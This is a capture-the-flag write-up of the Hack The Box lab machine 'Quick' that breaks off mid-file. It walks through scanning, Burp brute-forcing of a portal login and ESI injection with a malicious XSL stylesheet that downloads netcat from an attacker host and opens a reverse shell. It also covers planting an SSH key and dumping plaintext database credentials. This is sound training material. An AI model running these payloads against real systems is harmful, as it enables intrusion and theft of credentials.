Welcome back my friends. This time we are tackling a box whose name does not really represent its reality "Quick". Let me just say that it was not so quick to hack, but I learned a lot of new things.

Lets jump right in!

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.186 - Quick$ sudo nmap -A -T4 10.10.10.186
[sudo] password for in7rud3r: 
Swipe your right index finger across the fingerprint reader
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-12 10:56 CEST
Nmap scan report for 10.10.10.186
Host is up (0.045s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fb:b0:61:82:39:50:4b:21:a8:62:98:4c:9c:38:82:70 (RSA)
|   256 ee:bb:4b:72:63:17:10:ee:08:ff:e5:86:71:fe:8f:80 (ECDSA)
|_  256 80:a6:c2:73:41:f0:35:4e:5f:61:a7:6a:50:ea:b8:2e (ED25519)
9001/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Quick | Broadband Services
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=7/12%OT=22%CT=1%CU=42699%PV=Y%DS=2%DC=T%G=Y%TM=5F0AD0C
OS:B%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=2%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 995/tcp)
HOP RTT      ADDRESS
1   47.76 ms 10.10.14.1
2   46.74 ms 10.10.10.186

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 141.55 seconds


As usual, the next step to follow is the exposed web portal, where I discover the following:

http://10.10.10.186:9001/

The first one is really tricky, it seems to answer to the port 443, but it's not listed in open ports result of the scan. Anyway, put the domains on the hosts file and try again.

10.10.10.186	portal.quick.htb
10.10.10.186	quick.htb


But the https://portal.quick.htb doesn't answer again. I try with dirb command for hidden folders, but nothing was highlighted. I see that in the code is the word "jetspeed", so searching online I discover that "Jetspeed is an Open Source implementation of an Enterprise Information Portal, using Java and XML.".

Searching again I found also an exploit available on metasploit-framework.

msf5 > search jetspeed

Matching Modules
================

   #  Name                                            Disclosure Date  Rank    Check  Description
   -  ----                                            ---------------  ----    -----  -----------
   0  exploit/multi/http/apache_jetspeed_file_upload  2016-03-06       manual  No     Apache Jetspeed Arbitrary File Upload


msf5 > use exploit/multi/http/apache_jetspeed_file_upload
[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf5 exploit(multi/http/apache_jetspeed_file_upload) > options 

Module options (exploit/multi/http/apache_jetspeed_file_upload):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    8080             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.74     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Apache Jetspeed <= 2.3.0 (Linux)


msf5 exploit(multi/http/apache_jetspeed_file_upload) > set rhosts 10.10.10.186
rhosts => 10.10.10.186
msf5 exploit(multi/http/apache_jetspeed_file_upload) > set rport 9001
rport => 9001
msf5 exploit(multi/http/apache_jetspeed_file_upload) > set lhost 10.10.14.70
lhost => 10.10.14.70
msf5 exploit(multi/http/apache_jetspeed_file_upload) > exploit

[*] Started reverse TCP handler on 10.10.14.70:4444 
[*] 10.10.10.186:9001 - Creating admin user: rapkorjy:8pAVPfN9
[*] 10.10.10.186:9001 - Logging in as newly created admin
[*] 10.10.10.186:9001 - Uploading payload ZIP: sgtDgIsT.zip
[-] Exploit failed: TypeError no implicit conversion of nil into String
[*] 10.10.10.186:9001 - Deleting user: rapkorjy
[!] 10.10.10.186:9001 - This exploit may require manual cleanup of '../webapps/jetspeed/aTpMdRii.jsp' on the target
[!] 10.10.10.186:9001 - This exploit may require manual cleanup of '../temp/rapkorjy' on the target
[*] Exploit completed, but no session was created.


But it doesn't work. I continue to work the link to the portal domain, but as I said it's not reachable. It's really strange that there's a link on the page that bring on a dead portal, it should be there for a reason. On the forum someone suggest to "check all the protocol", so, I try to check the UDP ports that I leave out usually.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.186 - Quick$ sudo nmap -sU -T4 10.10.10.186
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-14 16:08 CEST
Warning: 10.10.10.186 giving up on port because retransmission cap hit (6).
Nmap scan report for quick.htb (10.10.10.186)
Host is up (0.064s latency).
Not shown: 982 closed ports
PORT      STATE         SERVICE
443/udp   open|filtered https
776/udp   open|filtered wpages
9370/udp  open|filtered unknown
17205/udp open|filtered unknown
18331/udp open|filtered unknown
19687/udp open|filtered unknown
20522/udp open|filtered unknown
21834/udp open|filtered unknown
21948/udp open|filtered unknown
34555/udp open|filtered unknown
36206/udp open|filtered unknown
45685/udp open|filtered unknown
49156/udp open|filtered unknown
49181/udp open|filtered unknown
49194/udp open|filtered unknown
49195/udp open|filtered unknown
53037/udp open|filtered unknown
53571/udp open|filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 1071.48 seconds


Wooo, many port open, but my attention is for the https one. Well, first time I see this, so, I have to study. Searching on internet for "how to navigate https on udp", I found this:

HTTP OVER UDP - C3Lab

Reading the article I see words like "Quick UDP Internet Connections (QUIC)" that ensure me about the direction I'm following. I concentrate my search on that and other interesting pages was found:

QUIC - Wikipedia
HTTP/3 - Wikipedia

Good, there's a list of the browser able to navigate the HTTP3 protocol:

I have to understand how enable this kind of navigatio; I search for "enable http/3 on chrome", but...

HTTP/3: the past, the present, and the future
We are now happy to announce that QUIC and HTTP/3 support is available on the Cloudflare edge network. We’re excited to be joined in this announcement by Google Chrome and Mozilla Firefox, two of the leading browser vendors and partners in our effort to make the web faster and more reliable for all.

...I understand that need the Canary version of chrome, that, however, is not available for linux. I continue to read the article and I understand that there's some other tools to navigate in HTTP3 protocol.

I can't navigate as in a normal browser, but I can go ahead, anyway.

in7rud3r@kali:/tmp/quiche$ RUST_LOG=info target/debug/examples/http3-client https://portal.quick.htb/

<html>
<title> Quick | Customer Portal</title>
<h1>Quick | Portal</h1>
<head>
<style>
ul {
  list-style-type: none;
  margin: 0;
  padding: 0;
  width: 200px;
  background-color: #f1f1f1;
}

li a {
  display: block;
  color: #000;
  padding: 8px 16px;
  text-decoration: none;
}

/* Change the link color on hover */
li a:hover {
  background-color: #555;
  color: white;
}
</style>
</head>
<body>
<p> Welcome to Quick User Portal</p>
<ul>
  <li><a href="index.php">Home</a></li>
  <li><a href="index.php?view=contact">Contact</a></li>
  <li><a href="index.php?view=about">About</a></li>
  <li><a href="index.php?view=docs">References</a></li>
</ul>
</html>


In the home of the portal I can list the available pages.

in7rud3r@kali:/tmp/quiche$ RUST_LOG=info target/debug/examples/http3-client https://portal.quick.htb/index.php?view=contact
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body {font-family: Arial, Helvetica, sans-serif;}
* {box-sizing: border-box;}

input[type=text], select, textarea {
  width: 100%;
  padding: 12px;
  border: 1px solid #ccc;
  border-radius: 4px;
  box-sizing: border-box;
  margin-top: 6px;
  margin-bottom: 16px;
  resize: vertical;
}

input[type=submit] {
  background-color: #4CAF50;
  color: white;
  padding: 12px 20px;
  border: none;
  border-radius: 4px;
  cursor: pointer;
}

input[type=submit]:hover {
  background-color: #45a049;
}

.container {
  border-radius: 5px;
  background-color: #f2f2f2;
  padding: 20px;
}
</style>
</head>
<body>
<h1>Quick | Contact</h1>

<div class="container">
  <form action="/">
    <label for="fname">First Name</label>
    <input type="text" id="fname" name="firstname" placeholder="Your name..">

    <label for="lname">Last Name</label>
    <input type="text" id="lname" name="lastname" placeholder="Your last name..">

    <label for="country">Country</label>
    <select id="country" name="country">
      <option value="australia">Australia</option>
      <option value="canada">Canada</option>
      <option value="usa">USA</option>
    </select>

    <label for="subject">Subject</label>
    <textarea id="subject" name="subject" placeholder="Write something.." style="height:200px"></textarea>

    <input type="submit" value="Submit">
  </form>
</div>

</body>
</html>


Contact page allows the user to submit a support request.

in7rud3r@kali:/tmp/quiche$ RUST_LOG=info target/debug/examples/http3-client https://portal.quick.htb/index.php?view=about
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body {
  font-family: Arial, Helvetica, sans-serif;
  margin: 0;
}

html {
  box-sizing: border-box;
}

*, *:before, *:after {
  box-sizing: inherit;
}

.column {
  float: left;
  width: 33.3%;
  margin-bottom: 16px;
  padding: 0 8px;
}

.card {
  box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2);
  margin: 8px;
}

.about-section {
  padding: 50px;
  text-align: center;
  background-color: #474e5d;
  color: white;
}

.container {
  padding: 0 16px;
}

.container::after, .row::after {
  content: "";
  clear: both;
  display: table;
}

.title {
  color: grey;
}

.button {
  border: none;
  outline: 0;
  display: inline-block;
  padding: 8px;
  color: white;
  background-color: #000;
  text-align: center;
  cursor: pointer;
  width: 100%;
}

.button:hover {
  background-color: #555;
}

@media screen and (max-width: 650px) {
  .column {
    width: 100%;
    display: block;
  }
}
</style>
</head>
<body>

<div class="about-section">
  <h1>Quick | About Us </h1>
</div>

<h2 style="text-align:center">Our Team</h2>
<div class="row">
  <div class="column">
    <div class="card">
      <img src="/w3images/team1.jpg" alt="Jane" style="width:100%">
      <div class="container">
        <h2>Jane Doe</h2>
        <p class="title">CEO & Founder</p>
        <p>Quick Broadband services established in 2012 by Jane.</p>
        <p>jane@quick.htb</p>
      </div>
    </div>
  </div>

  <div class="column">
    <div class="card">
      <img src="/w3images/team2.jpg" alt="Mike" style="width:100%">
      <div class="container">
        <h2>Mike Ross</h2>
        <p class="title">Sales Manager</p>
        <p>Manages the sales and services.</p>
        <p>mike@quick.htb</p>
      </div>
    </div>
  </div>
  
  <div class="column">
    <div class="card">
      <img src="/w3images/team3.jpg" alt="John" style="width:100%">
      <div class="container">
        <h2>John Doe</h2>
        <p class="title">Web Designer</p>
        <p>Front end developer.</p>
        <p>john@quick.htb</p>
      </div>
    </div>
  </div>
</div>

</body>
</html>


In the about page, there is a small list of possible users.

in7rud3r@kali:/tmp/quiche$ RUST_LOG=info target/debug/examples/http3-client https://portal.quick.htb/index.php?view=docs
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">

<h1>Quick | References</h1>
<ul>
  <li><a href="docs/QuickStart.pdf">Quick-Start Guide</a></li>
  <li><a href="docs/Connectivity.pdf">Connectivity Guide</a></li>
</ul>
</head>
</html>


And on the docs page there are two interesting pdf files about how to use the new portal.

in7rud3r@kali:/tmp/quiche$ RUST_LOG=info target/debug/examples/http3-client https://portal.quick.htb/docs/QuickStart.pdf > ../dck/QuickStart.pdf
in7rud3r@kali:/tmp/quiche$ RUST_LOG=info target/debug/examples/http3-client https://portal.quick.htb/docs/Connectivity.pdf > ../dck/Connectivity.pdf


Good, the first password. Lets understand where to use it. It seems to be the default password for the customers, so, if someone has not reset his password, we could use it for the access to the portal. We have to create a list of users (mails) from the customers page and the customer's opinion displayed on the home of the original portal. In this case, a bit of fantasy listing to understand which could be the domain of the customers. Here is my list of users.

tim@QConsulting.Pvt.Ltd.co.uk
tim@QConsultingPvtLtd.co.uk
tim@QConsultingPvt.co.uk
tim@QConsultingLtd.co.uk
tim@QConsulting.Pvt.co.uk
tim@QConsulting.Ltd.co.uk
tim@QConsulting.co.uk
tim@QConsulting.com
tim@QConsulting.org
tim@QConsulting.net

roy@DarkwingSolutions.us
roy@Darkwing-Solutions.us
roy@Darkwing.Solutions.us
roy@Darkwing.us
roy@DarkwingSolutions.com
roy@Darkwing-Solutions.com
roy@Darkwing.Solutions.com
roy@Darkwing.com
roy@DarkwingSolutions.org
roy@Darkwing-Solutions.org
roy@Darkwing.Solutions.org
roy@Darkwing.org
roy@DarkwingSolutions.net
roy@Darkwing-Solutions.net
roy@Darkwing.Solutions.net
roy@Darkwing.net
roy@Darkwing.co

elisa@Wink.co.uk
elisa@Wink.com
elisa@Wink.org
elisa@Wink.net
elisa@WinkMedia.co.uk
elisa@Wink-Media.co.uk
elisa@Wink.Media.co.uk
elisa@WinkMedia.com
elisa@Wink-Media.com
elisa@Wink.Media.com
elisa@WinkMedia.net
elisa@Wink-Media.net
elisa@Wink.Media.net
elisa@WinkMedia.io
elisa@WinkMedia.ca

james@LazyCoop.Pvt.Ltd.cn
james@LazyCoopPvtLtd.cn
james@LazyCoopPvt.cn
james@LazyCoopLtd.cn
james@LazyCoop.Pvt.cn
james@LazyCoop.Ltd.cn
james@LazyCoop.cn
james@LazyCoop.com
james@LazyCoop.org
james@LazyCoop.net

And now we have to brute force the portal; burpsuite can help us, start it and set the proxy on firefox. Ensure that the intercept is on on the burp tool and call the page to login.

Forward the first request and try to insert a fake mail and password, this time wait to forward, we have to proceed in a different way: click action and "sent to intruder". Here you should see the text of the request with the two parameters for user (mail) and password to set. Give two names to the parameters delimited byt the "$" character. Select "cluster bomb" and proceed to configure the two parameters we have identified. for the first one, load the list of the users we have created before and set the password we have retrieve from the pdf files for the second parameters.

Well, now, we are ready to launch the attack pressing the "start attack" button.

You should receive all 200 OK result code, but, if one user is correct, probably the code will change and in fact we have a positive record. The page presented appears like the following image:

I dedicate some time to understand how the portal works, but I don't discover nothing new. Then I come back to my past activity and I see something on one of the images (the brute-force result) I posted before: the response report "X-Powered-By: Esigate". I search online and...

ESIGate - Webapp integration, Remote templating, Web accelerator
Esigate is a http proxy, with full support of ESI specification and additional features to make web application integration fast and easy.

Reading the specification I understand that it respect the "ESI 1.0 specification support" stndard and that "ESIGate fully implements ESI specification and adds some useful custom extensions.". Everything can be useful to accomplish our job, so, serching for "ESI specification exploit"...

Beyond XSS: Edge Side Include Injection

...and for "esigate exploit"...

ESI Injection Part 2: Abusing specific implementations

I found two interesting articles, I go deeper in order to understand how to use it. Ok, I start to try to insert the xsl code directly in the form, but nothing seems to be happen.

I try for hours to attack in that way, different shells, different languages, but nothing happens and I'm not sure that I'm using the attack in the right way, finally I read again the article and understand that I have to use this attack in another way. I activate a web server on my local machine and create the xsl files needed for the attack (in that way I start to see that, my request on the remote machine, was really sent and received... and served).

Here I restart another full session of the previous attacks I tried before, but again I found it difficult to bypass the vulnerability. To be sure my attack works, I proceed step by step starting from the upload of the nc tool, to ensure that I have it available on the remote machine. Prepare the xsl file to upload...

<?xml version="1.0" ?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" omit-xml-declaration="yes"/>
<xsl:template match="/"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<root>
<xsl:variable name="cmd"><![CDATA[wget http://10.10.14.145:4445/nc -O nccr]]></xsl:variable>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/>
Process: <xsl:value-of select="$process"/>
Command: <xsl:value-of select="$cmd"/>
</root>
</xsl:template>
</xsl:stylesheet>


...send the ticket to the server...

<esi:include src="http://10.10.14.145:4445/file.xml" stylesheet="http://10.10.14.145:4445/file.xsl">
</esi:include>


...and activate the request searching for the ticket number on the page.

My server web local, start to work:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.186 - Quick/attack/ws$ php -S 10.10.14.145:4445
[Sat Jul 18 12:33:57 2020] PHP 7.4.5 Development Server (http://10.10.14.145:4445) started
[Sat Jul 18 12:34:42 2020] 10.10.10.186:39288 Accepted
[Sat Jul 18 12:34:42 2020] 10.10.10.186:39288 [200]: (null) /file.xsl
[Sat Jul 18 12:34:42 2020] 10.10.10.186:39288 Closing


Ok, now I have the nc command available on the remote machine, but to launch it I have to change the execution permission on the file. So, I modify my xsl file with the command "chmod +x nccr" and send another request. Finally I try to launch the nc connection using the following command on the xsl file: ./nccr -e /bin/sh 10.10.14.145 4444, obviously, you have to launch a listener on your local machine before.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.186 - Quick$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.145] from quick.htb [10.10.10.186] 42202
pwd
/home/sam
whoami
sam
ls -la
total 112
drwxr-xr-x 7 sam  sam   4096 Jul 18 11:07 .
drwxr-xr-x 4 root root  4096 Mar 20 02:16 ..
lrwxrwxrwx 1 sam  sam      9 Mar 20 02:42 .bash_history -> /dev/null
-rw-r--r-- 1 sam  sam    220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 sam  sam   3771 Apr  4  2018 .bashrc
drwx------ 2 sam  sam   4096 Mar 20 01:33 .cache
drwxr-xr-x 5 sam  sam   4096 Mar 20 03:01 esigate-distribution-5.2
drwx------ 3 sam  sam   4096 Mar 20 01:33 .gnupg
drwxrwxr-x 3 sam  sam   4096 Mar 20 02:44 .local
-rw------- 1 sam  sam    375 Jul 18 10:58 .mysql_history
-rwxrwxr-x 1 sam  sam  35520 Jul 18 11:07 nccr
-rw------- 1 sam  sam    199 Jul 18 10:53 .php_history
-rw-r--r-- 1 sam  sam    807 Apr  4  2018 .profile
-rw-rw-r-- 1 sam  sam    152 Jul 17 15:32 s17
-rw-rw-r-- 1 sam  sam    152 Jul 17 15:32 s17.1
-rw-rw-r-- 1 sam  sam    152 Jul 17 15:32 s17.2
-rw-rw-r-- 1 sam  sam    152 Jul 17 15:32 s17.3
-rw-rw-r-- 1 sam  sam    152 Jul 17 15:32 s17.4
-rw-rw-r-- 1 sam  sam    152 Jul 17 15:32 s17.5
drwxrwxr-x 2 sam  sam   4096 Jul 18 10:15 .ssh
-r-------- 1 sam  sam     33 Jul 18 08:58 user.txt
cat user.txt
d******************************8


Well done, first flag is mine. Before I proceed, I'd like to have a best shell, so I try to activate the ssh for the user I'm logged in; I generate a ssh key on my machine:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.186 - Quick/attack/ssh$ ssh-keygen -t rsa -b 4096 -C "in7rud3r@kali"
Generating public/private rsa key pair.
Enter file in which to save the key (/home/in7rud3r/.ssh/id_rsa): ./id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in ./id_rsa
Your public key has been saved in ./id_rsa.pub
The key fingerprint is:
SHA256:tVLlNnyzcwlSY+6xitHDdBSZu9tsv3sZEzJn0aAePqw in7rud3r@kali
The key's randomart image is:
+---[RSA 4096]----+
|            .*=..|
|           +=+...|
|          ooB=+ .|
|         o+*+B+*.|
|        S..+=oO.o|
|         .o.oo = |
|         .E.  + +|
|             . =.|
|              .o*|
+----[SHA256]-----+
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.186 - Quick/attack/ssh$ ls -la
total 16
drwxr-xr-x 2 in7rud3r in7rud3r 4096 Jul 18 15:02 .
drwxr-xr-x 6 in7rud3r in7rud3r 4096 Jul 18 15:00 ..
-rw------- 1 in7rud3r in7rud3r 3381 Jul 18 15:02 id_rsa
-rw-r--r-- 1 in7rud3r in7rud3r  739 Jul 18 15:02 id_rsa.pub
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.186 - Quick/attack/ssh$ cat id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDMLQbZEwhu6iJStnYb44J9LL9d4TrRJ08YfGAjnn9lacDJHsQfQgbQHBtpEaFUnkmkiXg8YUlDxkre4jdDUviAdIzEMITILOLVnEyZ9TAxYhUZzEkX600ReDtLb286vD8fEliqhxPxnPdOoH21PIBvD5Nquu6yeXNM/b9FqX21kSCLnYOKQiZAaeAo5G4y3fwkhzfU4UoN3lGu3GJuAiwIIAsjvRHq054B3Hpd/p21Pv17wdlE+OTfu0//5/t+G2Nr1Vg5J4x+hytiZKIvh41rn2W30T0Ky0nQsgVhIDgaAzno5zvYxmT9q0uhLtXowuymww9l3CacvKeIr8TocIweMMHrgGhn2vQh3NSDum3w3g27H4eDCUc4LiJIL9REBEe7UWXCfzxR9ZM94v8+1nbx0akOGMsB8eY7P/a9gRCJLJaXabGpYMORJas0Lubiw53TphEoqQMrRjXsNf0lwhGgUO1ari8ntKRGX9yERp6SmNNJNw/yYi3JYQvbtHeQFeRQv1zXFSSnNxuC71ZddH2wq7XafMQ+Uor5s24WnAom8ZHFy0cuoUb0o3DqaJ80xioRHabCvOJIftJnv6MkyS0AWNzCWHBC2hB0r+UmGEBogEWMOuASgQKZhJoL1/BUfqKxpkOfzHkH4CYePDQmsEqhRGbiawHPPhc+avCmPA/a4w== in7rud3r@kali

.
..and add my key on the authorized_keys file on the .ssh folder of the user:

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDMLQbZEwhu6iJStnYb44J9LL9d4TrRJ08YfGAjnn9lacDJHsQfQgbQHBtpEaFUnkmkiXg8YUlDxkre4jdDUviAdIzEMITILOLVnEyZ9TAxYhUZzEkX600ReDtLb286vD8fEliqhxPxnPdOoH21PIBvD5Nquu6yeXNM/b9FqX21kSCLnYOKQiZAaeAo5G4y3fwkhzfU4UoN3lGu3GJuAiwIIAsjvRHq054B3Hpd/p21Pv17wdlE+OTfu0//5/t+G2Nr1Vg5J4x+hytiZKIvh41rn2W30T0Ky0nQsgVhIDgaAzno5zvYxmT9q0uhLtXowuymww9l3CacvKeIr8TocIweMMHrgGhn2vQh3NSDum3w3g27H4eDCUc4LiJIL9REBEe7UWXCfzxR9ZM94v8+1nbx0akOGMsB8eY7P/a9gRCJLJaXabGpYMORJas0Lubiw53TphEoqQMrRjXsNf0lwhGgUO1ari8ntKRGX9yERp6SmNNJNw/yYi3JYQvbtHeQFeRQv1zXFSSnNxuC71ZddH2wq7XafMQ+Uor5s24WnAom8ZHFy0cuoUb0o3DqaJ80xioRHabCvOJIftJnv6MkyS0AWNzCWHBC2hB0r+UmGEBogEWMOuASgQKZhJoL1/BUfqKxpkOfzHkH4CYePDQmsEqhRGbiawHPPhc+avCmPA/a4w== in7rud3r@kali" >> authorized_keys 
ls -la
total 12
drwxrwxr-x 2 sam sam 4096 Jul 18 13:03 .
drwxr-xr-x 7 sam sam 4096 Jul 18 12:59 ..
-rw-rw-r-- 1 sam sam  739 Jul 18 13:03 authorized_keys


And use it:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.186 - Quick/attack/ssh$ ssh -i id_rsa sam@10.10.10.186
The authenticity of host '10.10.10.186 (10.10.10.186)' can't be established.
ECDSA key fingerprint is SHA256:kEX5biAHQdV0la1P6VUH52+0TprzbPr+r0UfSni9aRk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.186' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Jul 18 13:04:05 UTC 2020

  System load:  0.0                Users logged in:                0
  Usage of /:   30.3% of 19.56GB   IP address for ens33:           10.10.10.186
  Memory usage: 17%                IP address for br-9ef1bb2e82cd: 172.18.0.1
  Swap usage:   0%                 IP address for docker0:         172.17.0.1
  Processes:    126


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

54 packages can be updated.
28 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Mar 20 01:33:16 2020
sam@quick:~$ 


Good, now, I used linPEAS.sh to enumerate on the machine, but nothing particular was highlighted, so I start to turn around for the folder and finally I found where the portal was exposed and not only, another portal is available, but I can't understand how to reach.

sam@quick:/var/www$ ls -la
total 20
drwxr-xr-x  5 root root 4096 Mar 21 03:07 .
drwxr-xr-x 14 root root 4096 Mar 20 02:10 ..
drwxr-xr-x  2 root root 4096 Mar 20 03:48 html
drwxrwxrwx  2 root root 4096 Mar 21 03:11 jobs
drwxr-xr-x  6 root root 4096 Mar 21 03:08 printer


The first one is in the html folder.

sam@quick:/var/www$ cd html
sam@quick:/var/www/html$ ls -la
total 52
drwxr-xr-x 2 root root 4096 Mar 20 03:48 .
drwxr-xr-x 5 root root 4096 Mar 21 03:07 ..
-rw-r--r-- 1 root root 2698 Mar 17 07:16 clients.php
-rw-r--r-- 1 root root   69 Mar 17 07:57 db.php
-rw-r--r-- 1 root root 9549 Mar 18 04:07 home.php
-rw-r--r-- 1 root root 3362 Mar 20 03:48 index.php
-rw-r--r-- 1 root root 5013 Mar 18 04:42 login.php
-rw-r--r-- 1 root root 1247 Mar 18 04:52 search.php
-rw-r--r-- 1 root root 7307 Mar 18 04:55 ticket.php
sam@quick:/var/www/html$ cat db.php 
<?php
$conn = new mysqli("localhost","db_adm","db_p4ss","quick");
?>


Where I found the administrative credentials of the database to connect.

sam@quick:/var/www/html$ cat login.php 
<?php 
include("db.php");
if(isset($_POST["email"]) && isset($_POST["password"]))
{
        $email=$_POST["email"];
        $password = $_POST["password"];
        $password = md5(crypt($password,'fa'));
        $stmt=$conn->prepare("select email,password from users where email=? and password=?");
        $stmt->bind_param("ss",$email,$password);
        $stmt->execute();
        $result = $stmt->get_result();
        $num_rows = $result->num_rows;
        if($num_rows > 0)
        {
                session_start();
                $_SESSION["loggedin"]=$email;
                header("location: home.php");
        }
        else
        {
                echo '<script>alert("Invalid Credentials");window.location.href="/login.php";</script>';
        }
}
else
{?>
[...]


And one interesting system of authentication based on the md5 and encryption feature of php.

sam@quick:/var/www$ cd printer/
sam@quick:/var/www/printer$ ls -la
total 68
drwxr-xr-x 6 root root 4096 Mar 21 03:08 .
drwxr-xr-x 5 root root 4096 Mar 21 03:07 ..
-rw-r--r-- 1 root root 8709 Mar 19 05:04 add_printer.php
drwxr-xr-x 2 root root 4096 Mar 18 13:34 css
-rw-r--r-- 1 root root   69 Mar 18 13:22 db.php
drwxr-xr-x 4 root root 4096 Mar 20 02:31 escpos-php
-rw-r--r-- 1 root root 1150 Mar 18 13:34 favicon.ico
drwxr-xr-x 2 root root 4096 Mar 18 13:34 fonts
-rw-r--r-- 1 root root 2591 Mar 19 05:30 home.php
drwxr-xr-x 2 root root 4096 Mar 19 05:30 images
-rw-r--r-- 1 root root 3348 Mar 20 05:33 index.php
-rw-r--r-- 1 root root 6392 Mar 21 03:08 job.php
-rw-r--r-- 1 root root 5380 Mar 19 05:04 printers.php
sam@quick:/var/www/printer$ cat db.php 
<?php
$conn = new mysqli("localhost","db_adm","db_p4ss","quick");
?>
sam@quick:/var/www/printer$ 


In the other folder, a strange portal is presented with a connection to the same database. So I give a look at the other files to understand what could be this portal.

sam@quick:/var/www/printer$ cat add_printer.php 
<?php
include("db.php");
$error = $message = $title = $type = $profile = $char_per_line = $path = $ip_address = $port = '';
include("db.php");
session_start();
if($_SESSION["loggedin"])
{

if ($_SERVER["REQUEST_METHOD"] == "POST") {

    if (empty($_POST["title"])) { $error .= '<p><strong>Title</strong> is required</p>'; }
    if (empty($_POST["type"])) { $error .= '<p><strong>Type</strong> is required</p>'; }
    if (empty($_POST["profile"])) { $error .= '<p><strong>Profile</strong> is required</p>'; }

    if ($_POST["type"] == 'network') {
        if (empty($_POST["ip_address"])) { $error .= '<p><strong>IP Address</strong> is required</p>'; }
        if (empty($_POST["port"])) { $error .= '<p><strong>Port</strong> is required</p>'; }
    }

    if(!$error){
    $title = $_POST["title"];
    $ip_address = $_POST["ip_address"];
    $port = $_POST["port"];
    $stmt=$conn->prepare("insert into jobs values(?,?,?)");
    $stmt->bind_param("sss",$title,$ip_address,$port);
    $stmt->execute();
    $message = 'Printer added';}
}

?><!DOCTYPE html>
[...]


The code is really simple, it seems that this page adds a link to a network printer on the database.

sam@quick:/var/www/printer$ cat printers.php 
<?php
include("db.php");
session_start();
if($_SESSION["loggedin"])
{
        if(isset($_GET["job"]))
        {
                $job=$_GET["job"];
                $title=$_GET["title"];
                if($job==='delete')
                {
                        $stmt=$conn->prepare("delete from jobs where title=?");
                        $stmt->bind_param("s",$title);
                        $stmt->execute();
                        $message="Printer Deleted";
                }
                if($job==='print')
                {
                        $stmt=$conn->prepare("select ip,port from jobs where title=?");
                        $stmt->bind_param("s",$title);
                        $stmt->execute();
